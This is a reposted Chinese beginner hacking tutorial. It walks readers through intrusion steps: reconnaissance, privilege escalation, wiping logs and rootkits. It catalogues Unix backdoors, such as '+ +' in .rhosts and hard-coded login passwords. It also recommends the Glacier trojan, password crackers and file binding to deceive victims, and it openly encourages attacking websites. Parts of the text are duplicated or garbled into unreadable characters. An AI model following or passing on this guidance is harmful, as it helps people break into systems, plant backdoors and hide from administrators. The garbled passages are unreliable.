怎么从0开始学黑客书籍(黑客基础菜鸟入门书籍)

黑客信息网

  本文转载连接:http://blog.sina.com.cn/s/blog_87a893360100z0ap.html

  看完的人10个有9个成了黑客

  看完的人10个有9个成了黑客

  还有一个是BC

  然而看完的人

  视力全下降1度

  黑客的基本技能

  1、黑客的精神态度是很重要的,但技术则更是重要。黑客的态度虽然是无可取代,随著新科技的发明和旧技术的取代,这些工具随时间在慢慢的改变。例如:以往总是会学会用机器码写程序,直到最近我们开始使用HTML。不过,在1996年末,当然,这是基础的hacking技能。在1997年,理所当然的,你必须学会C。但,如果你只是学一种语言,那么你不能算是一位黑客,了不起只能算是一个programmer。除此,你还必须学会学会以独立于任何程序语言之上的概括性观念来思考一件程序设计上的问题。要成为一位真正的黑客,你必须要能在几天之内将manual内容和你目前己经知道的关连起学会一种新的语言。也就是说,你必会学还了C之外的东西,你至少还要会LISP或Perl(Java也正在努力的挤上这个名单; 译者注: 我很怀疑这份名单)。除了几个重要的hacking常用语言之外,这些语言提供你一些不同的程序设计途径,并且让你在好的方法中学习。

  程序设计是一种复杂的技术,我没辨法在这提供完整的学习步骤。但是我能告诉你一些在书本上和课堂上所没有的东西(有很多,几乎全部最好的黑客们都是自习而来的)。(a) 读别人的程序码;(写程序,这两项是不错的方法。学习写程序就像在学习写一种良好的自然语言,最好的方法是去看一些专家们所写的东西,然后写一些你自己的东西,然后读更多,再写更多。然后一直持续,一直到你发展出一种属于自己的风格和特色。要找到好的程序码来看是很一件很困难的事,因为,对菜鸟黑客们而言,适于供他们阅读和努力的大型程序的source数量很少。但这事己有了戏剧性的变化了; 现在免费的供应的软件、程序设计工具和操作系统(大都公开提供 source,而且全都是由黑客们写成的)到处可看。进入下一个主题。

  2、取得一个免费的 UNIX,并学习使用和维护。我先假设你己经有一部个人电脑或者是可以使用任何一部(现在的小孩子真幸福,可如此轻易的拥有 :-))。取得黑客技巧的第一个步骤是取得一份Linux 或者一份免费的 BSD-Unix,并将它安装在自己的机器,并使之顺利的运作。没错,在这个世界上除了Unix之外,还有其它的操作系统。但是他们只提供bianry,你不能看到他们的程序码,你也不能修改他们。想要在DOS或Windows或MacOS开始hacking,无疑就是要你绑著枷锁跳舞一样。

  除此之外,Unix是Internet上的操作系统。当你在不懂Unix的情况下学习使用Internet时,你没辨法在不懂Unix的情况下成为 Internet的黑客。因为这个原故,现在的黑客文化还是很牢固的以Unix为中心。(这并不完全是正确的,而且有些活在旧时代的黑客甚至也不喜欢这种情形,但是Unix和Internet之间的共生共成己经到了牢不可破的地步,即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。) 因些,把Unix装起来吧! (我自己是喜欢Linux,但是还有其它的东东可用。) 学习它,让它运作起来,让它陪你努力精进。用他向整个Internet喊话。看程序码,改程序。

  有一天你成为一位高竿的黑客,你回头往后看时会发现,你得到比 Microsoft操作系统所能提供的还要好的程序设计工具(包括 C,Lisp和 Perl)。而且得到快乐,并学到比共生共成己经到了牢不可破的地步,即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。) 因些,把Unix装起来吧! (我自己是喜欢Linux,但是还有其它的东东可用。) 学习它,让它运作起来,让它陪你努力精进。用他向整个Internet喊话。看程序码,改程序。有一天你成为一位高竿的黑客,你回头往后看时会发现,你得到比Microsoft操作系统所能提供的还要好的程序设计工具(包括 C,Lisp和 Perl)。而且得到快乐,并

  学到比你想像中的还要多的知识。关于学习Unix,在Loginataka有更多的资料。(http://www.ccil.org/~esr/faqs/loginataka。)

  看一下Linux distribution的目录或 Linux CD,并把自己交付给它。

  3、学习使用World Wide Web并学会写 HTML。

  在黑客文化创造出来的东西,大多在他们的活动范围外被使用著,如,在工厂和辨公室或大学被漠漠的使用著。但Web是一个很大的例外,这个黑客眼中的大玩具甚至还被政客们接受,并巧巧的在改变这个世界。因此(还有很多好的理由),你必须学习Web。并不只是学习使用browser(这太容易了)而己,还要学会写HTML这个Web的标签语言。如果你不知道如何设计程序,写HTML也可以给一些习惯上的帮助。嗯!! 建立home page吧! 不过,有一个home page 并没任何特别之处能让你成为一位黑客。Web上到处都是home page,而且大部份都没什么重点,没什么内容的烂泥 -- 很好看的烂泥巴,但是看起来都一样,差不多。

  4、至少学会以下的其中两种:

  一、网站服务器程序ASP、PHP、CGI、jsP

  我个人认为CGI是最难学的其中一种。

  二、程序语言:C语言、C++、VB、JAVA、PERL、DELPHI、汇编语言

  不过我认为C语言的通用性最好,可以跨平台(操作系统)使用。

  还要试着自己写程序、开发软件等工作。

  三、数据库管理软件:MYSQL、SQL、FOXPRO……等。

  四、几种常用的操作系统:WIN98、WIN2000、WINNT、WINXP、UNIX、LINUX、要是能学到UNIX那是最好不过的了。最最基本的WIN2K、WINNT也要学会吧。

  如果以上的你都会了,那么你已经是个高手了

  黑客初级技术讲解(上)

  网络安全从其本质上来讲就是网络上的信息安全。从广义来说,凡是涉及到网络上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。确保网络系统的信息安全是网络安全的目标,信息安全包括两个方面:信息的存储安全和信息的传输安全。信息的存储安全是指信息在静态存放状态下的安全,如是否会被非授权调用等。信息的传输安全是指信息在动态传输过程中安全。为了确保网络信息的传输安全,有以下几个问题:

  (1)对网络上信息的监听

  (2)对用户身份的仿冒

  (3)对网络上信息的篡改

  (4)对发出的信息予以否认

  (5)对信息进行重发

  对于一般的常用入侵方法主要有

  1.口令入侵

  所谓口令入侵,就是指用一些软件解开已经得到但被人加密的口令文档,不过许多黑客已大量采用一种可以绕开或屏蔽口令保护的程序来完成这项工作。对于那些可以解开或屏蔽口令保护的程序通常被称为“Crack”。由于这些软件的广为流传,使得入侵电脑网络系统有时变得相当简单,一般不需要很深入了解系统的内部结构,是初学者的好方法。

  2.特洛伊木马术

  说到特洛伊木马,只要知道这个故事的人就不难理解,它最典型的做法可能就是把一个能帮助黑客完成某一特定动作的程序依附在某一合法用户的正常程序中,这时合法用户的程序代码已被该变。一旦用户触发该程序,那么依附在内的黑客指令代码同时被激活,这些代码往往能完成黑客指定的任务。由于这种入侵法需要黑客有很好的编程经验,且要更改代码、要一定的权限,所以较难掌握。但正因为它的复杂性,一般的系统管理员很难发现。

  3.监听法

  这是一个很实用但风险也很大的黑客入侵方法,但还是有很多入侵系统的黑客采用此类方法,正所谓艺高人胆大。

  网络节点或工作站之间的交流是通过信息流的转送得以实现,而当在一个没有集线器的网络中,数据的传输并没有指明特定的方向,这时每一个网络节点或工作站都是一个接口。这就好比某一节点说:“嗨!你们中有谁是我要发信息的工作站。”

  此时,所有的系统接口都收到了这个信息,一旦某个工作站说:“嗨!那是我,请把数据传过来。”联接就马上完成。

  目前有网络上流传着很多嗅探软件,利用这些软件就可以很简单的监听到数据,甚至就包含口令文件,有的服务在传输文件中直接使用明文传输,这也是非常危险的

  4.E-mail技术

  使用email加木马程序这是黑客经常使用的一种手段,而且非常奏效,一般的用户,甚至是网管,对网络安全的意识太过于淡薄,这就给很多黑客以可乘之机。

  5.病毒技术

  作为一个黑客,如此使用应该是一件可耻的事情,不过大家可以学习,毕竟也是一种攻击的办法,特殊时间,特殊地点完全可以使用。

  6.隐藏技术

  网络攻击的一般步骤及实例

  攻击的准备阶段

  首先需要说明的是,入侵者的来源有两种,一种是内部人员利用自己的工作机会和权限来获取不应该获取的权限而进行的攻击。另一种是外部人员入侵,包括远程入侵、网络节点接入入侵等。本节主要讨论远程攻击。

  进行网络攻击是一件系统性很强的工作,其主要工作流程是:收集情报,远程攻击,远程登录,取得普通用户的权限,取得超级用户的权限,留下后门,清除日志。主要内容包括目标分析,文档获取,破解密码,日志清除等技术,下面分别介绍。

  1.确定攻击的目的

  攻击者在进行一次完整的攻击之前首先要确定攻击要达到什么样的目的,即给对方造成什么样的后果。常见的攻击目的有破坏型和入侵型两种。破坏型攻击指的只是破坏攻击目标,使其不能正常工作,而不能随意控制目标的系统的运行。要达到破坏型攻击的目的,主要的手段是拒绝服务攻击(Denial Of Service)。另一类常见的攻击目的是入侵攻击目标,这种攻击是要获得一定的权限来达到控制攻击目标的目的。应该说这种攻击比破坏型攻击更为普遍,威胁性也更大。因为黑客一旦获取攻击目标的管理员权限就可以对此服务器做任意动作,包括破坏性的攻击。此类攻击一般也是利用服务器操作系统、应用软件或者网络协议存在的漏洞进行的。当然还有另一种造成此种攻击的原因就是密码泄露,攻击者靠猜测或者穷举法来得到服务器用户的密码,然后就可以用和真正的管理员一样对服务器进行访问。

  2.信息收集

  除了确定攻击目的之外,攻击前的最主要工作就是收集尽量多的关于攻击目标的信息。这些信息主要包括目标的操作系统类型及版本,目标提供哪些服务,各服务器程序的类型与版本以及相关的社会信息。

  要攻击一台机器,首先要确定它上面正在运行的操作系统是什么,因为对于不同类型的操作系统,其上的系统漏洞有很大区别,所以攻击的方法也完全不同,甚至同一种操作系统的不同版本的系统漏洞也是不一样的。要确定一台服务器的操作系统一般是靠经验,有些服务器的某些服务显示信息会泄露其操作系统。例如当我们通过TELNET连上一台机器时,如果显示

  Unix(r)System V Release 4.0

  login:

  那么根据经验就可以确定这个机器上运行的操作系统为SUN OS 5.5或5.5.l。但这样确定操作系统类型是不准确的,因为有些网站管理员为了迷惑攻击者会故意更改显示信息,造成假象。

  还有一种不是很有效的方法,诸如查询DNS的主机信息(不是很可靠)来看登记域名时的申请机器类型和操作系统类型,或者使用社会工程学的方法来获得,以及利用某些主机开放的SNMP的公共组来查询。

  另外一种相对比较准确的方法是利用网络操作系统里的TCP/IP堆栈作为特殊的“指纹”来确定系统的真正身份。因为不同的操作系统在网络底层协议的各种实现细节上略有不同。可以通过远程向目标发送特殊的包,然后通过返回的包来确定操作系统类型。例如通过向目标机发送一个FIN的包(或者是任何没有ACK 或SYN标记的包)到目标主机的一个开放的端口然后等待回应。许多系统如windows、 BSDI、 CISCO、 HP/UX和 IRIX会返回一个RESET。通过发送一个SYN包,它含有没有定义的TCP标记的TCP头。那么在Linux系统的回应包就会包含这个没有定义的标记,而在一些别的系统则会在收到SYN+BOGU包之后关闭连接。或是利用寻找初始化序列长度模板与特定的操作系统相匹配的方法。利用它可以对许多系统分类,如较早的Unix系统是64K长度,一些新的Unix系统的长度则是随机增长。还有就是检查返回包里包含的窗口长度,这项技术根据各个操作系统的不同的初始化窗口大小来唯一确定它们。利用这种技术实现的工具很多,比较著名的有NMAP、CHECKOS、QUESO等。

  获知目标提供哪些服务及各服务daemon的类型、版本同样非常重要,因为已知的漏洞一般都是对某一服务的。这里说的提供服务就是指通常我们提到的喘口,例如一般 TELNET在23端口,FTP在对21端口,WWW在80端口或8080端口,这只是一般情况,网站管理完全可以按自己的意愿修改服务所监听的端口号。在不同服务器上提供同一种服务的软件也可以是不同,我们管这种软件叫做daemon,例如同样是提供FTP服务,可以使用wuftp、proftp, ncftp等许多不同种类的daemon。确定daemon的类型版本也有助于黑客利用系统漏洞攻破网站。

  另外需要获得的关于系统的信息就是一些与计算机本身没有关系的社会信息,例如网站所属公司的名称、规模,网络管理员的生活习惯、电话号码等。这些信息看起来与攻击一个网站没有关系,实际上很多黑客都是利用了这类信息攻破网站的。例如有些网站管理员用自己的电话号码做系统密码,如果掌握了该电话号码,就等于掌握了管理员权限进行信息收集可以用手工进行,也可以利用工具来完成,完成信息收集的工具叫做扫描器。用扫描器收集信息的优点是速度快,可以一次对多个目标进行扫描。

  攻击的实施阶段

  1.获得权限

  当收集到足够的信息之后,攻击者就要开始实施攻击行动了。作为破坏性攻击,只需利用工具发动攻击即可。而作为入侵性攻击,往往要利用收集到的信息,找到其系统漏洞,然后利用该漏洞获取一定的权限。有时获得了一般用户的权限就足以达到修改主页等目的了,但作为一次完整的攻击是要获得系统最高权限的,这不仅是为了达到一定的目的,更重要的是证明攻击者的能力,这也符合黑客的追求。

  能够被攻击者所利用的漏洞不仅包括系统软件设计上的安全漏洞,也包括由于管理配置不当而造成的漏洞。前不久,因特网上应用最普及的著名www服务器提供商Apache的主页被黑客攻破,其主页面上的 Powered by Apache图样(羽毛状的图画)被改成了Powered by Microsoft Backoffice的图样,那个攻击者就是利用了管理员对Webserver用数据库的一些不当配置而成功取得最高权限的。

  黑客初级技术讲解(中)

  当然大多数攻击成功的范例还是利用了系统软件本身的漏洞。造成软件漏洞的主要原因在于编制该软件的程序员缺乏安全意识。当攻击者对软件进行非正常的调用请求时造成缓冲区溢出或者对文件的非法访问。其中利用缓冲区溢出进行的攻击最为普遍,据统计80%以上成功的攻击都是利用了缓冲区溢出漏洞来获得非法权限的。关于缓冲区溢出在后面用专门章节来作详细解释。

  无论作为一个黑客还是一个网络管理员,都需要掌握尽量多的系统漏洞。黑客需要用它来完成攻击,而管理员需要根据不同的漏洞来进行不同的防御措施。了解最新最多的漏洞信息,可以到诸如Rootshell(www.rootshell.com)、Packetstorm(packetstorm.securify.com)、Securityfocus(www.securityfocus.com)等网站去查找。

  2.权限的扩大

  系统漏洞分为远程漏洞和本地漏洞两种,远程漏洞是指黑客可以在别的机器上直接利用该漏洞进行攻击并获取一定的权限。这种漏洞的威胁性相当大,黑客的攻击一般都是从远程漏洞开始的。但是利用远程漏洞获取的不一定是最高权限,而往往只是一个普通用户的权限,这样常常没有办法做黑客们想要做的事。这时就需要配合本地漏洞来把获得的权限进行扩大,常常是扩大至系统的管理员权限。

  只有获得了最高的管理员权限之后,才可以做诸如网络监听、打扫痕迹之类的事情。要完成权限的扩大,不但可以利用已获得的权限在系统上执行利用本地漏洞的程序,还可以放一些木马之类的欺骗程序来套取管理员密码,这种木马是放在本地套取最高权限用的,而不能进行远程控制。例如一个黑客已经在一台机器上获得了一个普通用户的账号和登录权限,那么他就可以在这台机器上放置一个假的su 程序。一旦黑客放置了假su程序,当真正的合法用户登录时,运行了su,并输入了密码,这时root密码就会被记录下来,下次黑客再登录时就可以使用su 变成root了。

  攻击的善后工作

  1.日志系统简介

  如果攻击者完成攻击后就立刻离开系统而不做任何善后工作,那么他的行踪将很快被系统管理员发现,因为所有的网络操作系统一般都提供日志记录功能,会把系统上发生的动作记录下来。所以,为了自身的隐蔽性,黑客一般都会抹掉自己在日志中留下的痕迹。想要了解黑客抹掉痕迹的方法,首先要了解常见的操作系统的日志结构以及工作方式。Unix的日志文件通常放在下面这几个位置,根据操作系统的不同略有变化

  /usr/adm——早期版本的Unix。

  /Var/adm新一点的版本使用这个位置。

  /Varflort一些版本的Solaris、 Linux BSD、 Free BSD使用这个位置。

  /etc,大多数Unix版本把Utmp放在此处,一些Unix版本也把Wtmp放在这里,这也是Syslog.conf的位置。

  下面的文件可能会根据你所在的目录不同而不同:

  acct或pacct-一记录每个用户使用的命令记录。

  accesslog主要用来服务器运行了NCSA HTTP服务器,这个记录文件会记录有什么站点连接过你的服务器。

  aculo保存拨出去的Modems记录。

  lastlog记录了最近的Login记录和每个用户的最初目的地,有时是最后不成功Login的记录。

  loginlog一记录一些不正常的L0gin记录。

  messages——记录输出到系统控制台的记录,另外的信息由Syslog来生成

  security记录一些使用 UUCP系统企图进入限制范围的事例。

  sulog记录使用su命令的记录。

  utmp记录当前登录到系统中的所有用户,这个文件伴随着用户进入和离开系统而不断变化。

  Utmpx,utmp的扩展。

  wtmp记录用户登录和退出事件。

  Syslog最重要的日志文件,使用syslogd守护程序来获得。

  2.隐藏踪迹

  攻击者在获得系统最高管理员权限之后就可以随意修改系统上的文件了(只对常规 Unix系统而言),包括日志文件,所以一般黑客想要隐藏自己的踪迹的话,就会对日志进行修改。最简单的方法当然就是删除日志文件了,但这样做虽然避免了系统管理员根据IP追踪到自己,但也明确无误地告诉了管理员,系统己经被人侵了。所以最常用的办法是只对日志文件中有关自己的那一部分做修改。关于修改方法的具体细节根据不同的操作系统有所区别,网络上有许多此类功能的程序,例如 zap、 wipe等,其主要做法就是清除 utmp、wtmp、Lastlog和 Pacct等日志文件中某一用户的信息,使得当使用w、who、last等命令查看日志文件时,隐藏掉此用户的信息。

  管理员想要避免日志系统被黑客修改,应该采取一定的措施,例如用打印机实时记录网络日志信息。但这样做也有弊端,黑客一旦了解到你的做法就会不停地向日志里写入无用的信息,使得打印机不停地打印日志,直到所有的纸用光为止。所以比较好的避免日志被修改的办法是把所有日志文件发送到一台比较安全的主机上,即使用loghost。即使是这样也不能完全避免日志被修改的可能性,因为黑客既然能攻入这台主机,也很可能攻入loghost。

  只修改日志是不够的,因为百密必有一漏,即使自认为修改了所有的日志,仍然会留下一些蛛丝马迹的。例如安装了某些后门程序,运行后也可能被管理员发现。所以,黑客高手可以通过替换一些系统程序的方法来进一步隐藏踪迹。这种用来替换正常系统程序的黑客程序叫做rootkit,这类程序在一些黑客网站可以找到,比较常见的有 LinuxRootKit,现在已经发展到了5.0版本了。它可以替换系统的ls、ps、netstat、inetd等等一系列重要的系统程序,当替换了 ls后,就可以隐藏指定的文件,使得管理员在使用ls命令时无法看到这些文件,从而达到隐藏自己的目的。

  3.后门

  一般黑客都会在攻入系统后不只一次地进入该系统。为了下次再进入系统时方便一点,黑客会留下一个后门,特洛伊木马就是后门的最好范例。Unix中留后门的方法有很多种,下面介绍几种常见的后门,供网络管理员参考防范。

  <1>密码破解后门

  这是入侵者使用的最早也是最老的方法,它不仅可以获得对Unix机器的访问,而且可以通过破解密码制造后门。这就是破解口令薄弱的帐号。以后即使管理员封了入侵者的当前帐号,这些新的帐号仍然可能是重新侵入的后门。多数情况下,入侵者寻找口令薄弱的未使用帐号,然后将口令改的难些。当管理员寻找口令薄弱的帐号是,也不会发现这些密码已修改的帐号。因而管理员很难确定查封哪个帐号。

  <2>Rhosts + + 后门

  在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证方法。用户可以轻易的改变设置而不需口令就能进入。入侵者只要向可以访问的某用户的rhosts文件中输入"+ +",就可以允许任何人从任何地方无须口令便能进入这个帐号。特别当home目录通过NFS向外共享时,入侵者更热中于此。这些帐号也成了入侵者再次侵入的后门。许多人更喜欢使用Rsh,因为它通常缺少日志能力. 许多管理员经常检查 "+ +",所以入侵者实际上多设置来自网上的另一个帐号的主机名和 用户名,从而不易被发现。

  <3>校验和及时间戳后门

  早期,许多入侵者用自己的trojan程序替代二进制文件。系统管理员便依@@时间戳和系统校验和的程序辨别一个二进制文件是否已被改变,如Unix里的sum程序。入侵者又发展了使trojan文件和原文件时间戳同步的新技术。它是这样实现的: 先将系统时钟拨回到原文件时间,然后调整trojan文件的时间为系统时间。一旦二进制trojan文件与原来的精确同步,就可以把系统时间设回当前时间。Sum程序是基于CRC校验,很容易骗过。入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序。MD5是被大多数人推荐的,MD5使用的算法目前还没人能骗过。

  黑客初级技术讲解(下)

  <4>Login后门

  在Unix里,login程序通常用来对 telnet来的用户进行口令验证. 入侵者获取login.c的原代码并修改,使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入。这将允许入侵者进入任何帐号,甚至是root。由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问的,所以入侵者可以登录获取shell却不会暴露该帐号。管理员注意到这种后门后,便用"strings"命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形毕露。入侵者就开始加密或者更好的隐藏口令,使strings命令失效<5>Telnetd后门

  当用户telnet到系统,监听端口的inetd服务接受连接随后递给in.telnetd,由它运行 login.一些入侵者知道管理员会检查login是否被修改,就着手修改in.telnetd. 在in.telnetd内部有一些对用户信息的检验,比如用户使用了何种终端. 典型的终端设置是Xterm或者VT100.入侵者可以做这样的后门,当终端设置为"letmein"时产生一 个不要任何验证的shell. 入侵者已对某些服务作了后门,对来自特定源端口的连接产 生一个shell。

  <6>服务后门

  几乎所有网络服务曾被入侵者作过后门. Finger,rsh,rexec,rlogin,ftp,甚至 inetd等等的作了的版本随处多是。有的只是连接到某个TCP端口的shell,通过后门口令就能获取访问。这些程序有时用刺娲□?Ucp这样不用的服务,或者被加入inetd.conf 作为一个新的服务,管理员应该非常注意那些服务正在运行,并用MD5对原服务程序做校验。

  <7>Cronjob后门

  Unix上的Cronjob可以按时间表调度特定程序的运行。入侵者可以加入后门shell程序使它在1AM到2AM之间运行,那么每晚有一个小时可以获得访问。也可以查看cronjob中经常运行的合法程序,同时置入后门。

  <8>库后门

  几乎所有的UNIX系统使用共享库,共享库用于相同函数的重用而减少代码长度。一些入侵者在象crypt.c和_crypt.c这些函数里作了后门;象 login.c这样的程序调用了 crypt()。当使用后门口令时产生一个shell。因此,即使管理员用MD5检查login程序,仍然能产生一个后门函数,而且许多管理员并不会检查库是否被做了后门。对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验,有一种办法是入侵者对open()和文件访问函数做后门。后门函数读原文件但执行trojan后门程序。所以当MD5读这些文件时,校验和一切正常,但当系统运行时将执行trojan版本的,即使trojan库本身也可躲过MD5校验,对于管理员来说有一种方法可以找到后门,就是静态编连MD5校验程序然后运行,静态连接程序不会使用trojan共享库。

  <9>内核后门

  内核是Unix工作的核心,用于库躲过MD5校验的方法同样适用于内核级别,甚至连静态 连接多不能识别. 一个后门作的很好的内核是最难被管理员查找的,所幸的是内核的 后门程序还不是随手可得,每人知道它事实上传播有多广。

  <10>文件系统后门

  入侵者需要在服务器上存储他们的掠夺品或数据,并不能被管理员发现,入侵者的文章常是包括exploit脚本工具,后门集,sniffer日志, email的备分,原代码,等等!有时为了防止管理员发现这么大的文件,入侵者需要修补"ls","du","fsck"以隐匿特定的目录和文件,在很低的级别,入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分,且表示为坏的扇区。因此入侵者只能用特别的工具访问这些隐藏的文件,对于普通的管理员来说,很难发现这些"坏扇区"里的文件系统,而它又确实存在。

  <11>Boot块后门

  在PC世界里,许多病毒藏匿与根区,而杀病毒软件就是检查根区是否被改变。Unix下,多数管理员没有检查根区的软件,所以一些入侵者将一些后门留在根区。

  . 所以更多的管理员是 用MD5校验和检测这种后门的。

  <12>隐匿进程后门

  入侵者通常想隐匿他们运行的程序,这样的程序一般是口令破解程序和监听程序 (sniffer),有许多办法可以实现,这里是较通用的: 编写程序时修改自己的argv[] 使它看起来象其他进程名。可以将sniffer程序改名类似in.syslog再执行,因此当管理员用"ps"检查运行进程时,出现的是标准服务名。可以修改库函数致使 "ps"不能显示所有进程,可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现。使用这个技术的一个后门例子是

  amod.tar.gz :

  http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html网络通行. 这些网络通行后 门有时允许入侵者通过防火墙进行访问。有许多网络后门程序允许入侵者建立某个端 口号并不用通过普通服务就能实现访问. 因为这是通过非标准网络端口的通行,管理 员可能忽视入侵者的足迹. 这种后门通常使用TCP,UDP和ICMP,但也可能是其他类型报文。

  <14>TCP Shell 后门

  入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下,他们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat 命令查看当前的连接状态,那些端口在侦听,目前连接的来龙去脉. 通常这些后门可 以让入侵者躲过TCP Wrapper技术. 这些后门可以放在SMTP端口,许多防火墙允许 e-mail通行的.

  <15>UDP Shell 后门

  管理员经常注意TCP连接并观察其怪异情况,而UDP Shell后门没有这样的连接,所以 netstat不能显示入侵者的访问痕迹,许多防火墙设置成允许类似DNS的UDP报文的通行,通常入侵者将UDP Shell放置在这个端口,允许穿越防火墙。

  <16>ICMP Shell 后门

  Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一。许多防火墙允许外界ping它内部的机器,入侵者可以放数据入Ping的ICMP 包,在ping的机器间形成一个shell通道,管理员也许会注意到Ping包暴风,但除了他查看包内数据,否者入侵者不会暴露。

  <17>加密连接

  管理员可能建立一个sniffer试图某个访问的数据,但当入侵者给网络通行后门加密后,就不可能被判定两台机器间的传输内容了。

  

  基础知识(1)

  我认为这是一套适合初学者由浅到深的文章,所以强烈推荐给大家,作者从基础讲到最近比较火的漏洞,可能有些人看来是浅了些,但是的确很适合想干点啥但又不知道怎么办的菜鸟们。

  第一节,伸展运动。这节操我们要准备道具,俗话说:“工欲善其事,必先利其器”(是这样吗?哎!文化低……)说得有道理,我们要学习黑客技术,一点必要的工具必不可少。

  1,一台属于自己的可以上网的电脑。这样你可以有充分的支配权,上网不用说,否则你怎么看到我的文章?wap呵呵!属于自己很重要,否则安全性是个很大的问题。第一点相信大家没有问题。

  2, windows2000/nt,别和我说98/me,他们是你们同学用来玩游戏的!(当然,我也是铁杆game fan)对网络支持极差,命令受限制,很多软件又不能用,对黑客来说使用起来绊手绊脚,非常不利。这里我推荐2000,这是一个很成熟的系统(漏洞还是有一堆)。推荐双系统,这样黑玩搭配,干活不累。

  3,冰河。中国第一木马,中者数不胜数,国人骄傲。虽然用冰河根本不能算黑客,但它确实能培养你对黑客的兴趣,同时帮助你了解网络,相信很多黑客同学都是这样起步的。静止写的那篇冰河教程很不错,大家仔细看看。而且,以后你学会入侵服务器后,用冰河操作也会减少工作量(我是懒虫,爽!)

  4,oicq。我们学黑客,可不是学泡mm!bfctx你………… 息怒息怒!我们当然是学黑客,但不要忘了,众人拾柴火更高,我们通过cshu的成员列表,互相联系帮助,对提高水平很有帮助!另外我要废话一句:据我了解,现在黑客网站下载最多的都是针对oicq的破解工具,我个人认为很无聊,偷个密码代表什么,浪费时间!最后补充:mm不能不泡。(谁砸我??!!)

  5,superscan。很好用的端口扫描器,速度超快,功能一流,一旦拥有,别无所求……(打住!)不论是找木马受害者,还是扫服务器端口,它都非常有效,cshu强烈推荐!

  6,一本笔记本/便条,网上资料相当多,黑客处理的也是非常之多。良好的习惯决定了你的效率,准备一本笔记本,记录下你的成果,肉鸡,木马利用,命令,密码……坚持一下,你会发现你的效率大幅上升的!

  7,lc3.著名nt/2000sam破解程序,有时我们拿不到足够权限,又没好办法,那么lc3是最好的解决办法,只要你拿的到sam,你就是服务器它爷爷!本站有其破解程序,支持了暴力破解!

  8,程序合并。这是玩木马必需的,虽然木马是很低的手段,但有时配合巧办法(以后我会介绍)确实能够达到意想不到的效果,朋友们可以在空闲时玩玩木马,很有趣,若你能巧妙的骗过mm,那么webmaster也可能被你骗倒:〉(比较理想化)

  9,流光4for 2000/nt。可能是世界上最好的综合类黑软!中国的骄傲,它集成了很全的漏洞信息,速度快,方法多,对有漏洞的主机是毁灭性的打击,操作又方便,是快速黑站必不可少的精品工具。超级吐血推荐!!

  10,良好的心态,稳定的情绪,刻苦钻研的精神,刨根问底的作风,打扫房间的习惯。黑客是门很高深的学问,不要幻想一步登天,失败是常有的事,千万不可灰心。在那么多黑软的包围下,切不可完全依赖他们,一定要了解它们利用什么原理工作。对任何一个小问题,小细节,一定要问清楚,cshu就是给大家互相交流的场所哦!黑完后不要得意忘形,打扫战场也很重要,以防万一。

  第一节操完,可能很无聊,我就这点水平,大家见谅!这里我说一句大话:做完菜鸟操,包你会黑简单的站(哎哟!心慌了!)

  下一节操我们要介绍如何掌握一台主机的基本信息,期待中……

  真是太对不起大家了,隔了那么久才写这篇教程,我这几天实在太忙,大家还是体谅一下我吧,好了,开始做操。

  今天的内容是获得主机的信息。 我们要黑一台主机,首先要了解它的信息,包括它的类型,用户列表,目录,端口,漏洞等等。

  首先我们我们要找一台主机来练手,随便挑吧!www.flyingfish.com(乱说的)

  第一部,呵呵,先在ie里看看吧,mmmm.....做的还行,挺精致的!主要是我们肯定了它现在是正常的。然后,我们应该知道它的ip,很简单,ping它一下就可以了。

  pingwww.flyingfish.com,看看窗口里有了什么?是不是有三行回应,其中的111.111.222.222就是ip了(还是胡说的,一个例子)。有人是不是要问,我这里怎么没有。那可能是两个原因,第一,你打错命令了;第二,该主机装了防火墙,禁止ping,不过这种可能很小。

  知道了ip,下一步应该确定端口了。下面是一些常用的端口的默认值

  21--ftp 重要哦

  23--telnet 欢呼吧

  25-smtp 尽管重要,但似乎没什么可利用的

  53--domain 同上

  79--finger 可知道用户信息了

  80--http 要看网页,没它不行吧

  110--pop 收信的

  139--netbios 共享用的,很有利用价值哦

  3389--win2000超级终端 呵呵,这个好!

  其实端口有上千种,这些最最常用

  我们怎么知道服务器有什么端口打开呢??去找个扫描器吧,x-scan ,super scan,flux等等很多哦。这里我推荐super scan ,速度很快,本站也有其教程哦!用法还是比较傻瓜的,估计大家不会有问题,轻轻几点,打开的端口就出现了。不错不错,上面说到的都有(太理想化了吧!)

  那么我们该如何应对呢?

  ps:忘了说一声,顺便扫一下7626,冰河有也说不准哦:)

  若有ftp,那就用用匿名登陆。自己动手也行,最好用x-scan flux等吧!反正,有ftp就有一份希望

  telnet 在!好!telnet 111.111.222.222,出现窗口了吧!嗯?要密码@蠢赐芑共皇浅蹲⒁馕拿饔糜铮海┧姹悴赂觯砹耍寥耍湵捩摯湵捩摯榬獩椮煤牦湯灴条硥整摮敩捳湡牢 牢戼 戼湵捩摯痚楮潣敤

  

  基础知识(2)

  今天我们谈谈unicode漏洞,这可是基础中的基础,重点里的重点,不懂的一定要好好学。

  2000年10月17日中联绿盟发布了以下的安全公告:

  微软IIS 4.0 / 5.0 扩展UNICODE目录遍历漏洞

  远程漏洞:是

  本地漏洞:是

  发布日期:2000年10月17日

  更新日期:2000年10月17日

  受影响的版本:

  Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0

  这可是中国乃至全球网络安全界的一次大变节,入侵nt/2000系统变得如此简单,不打补丁的死路一条。

  下面开始正式学习:

  一,UNICODE漏洞的原理

  此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,中国台湾繁体中文也同样存在这样的漏洞。

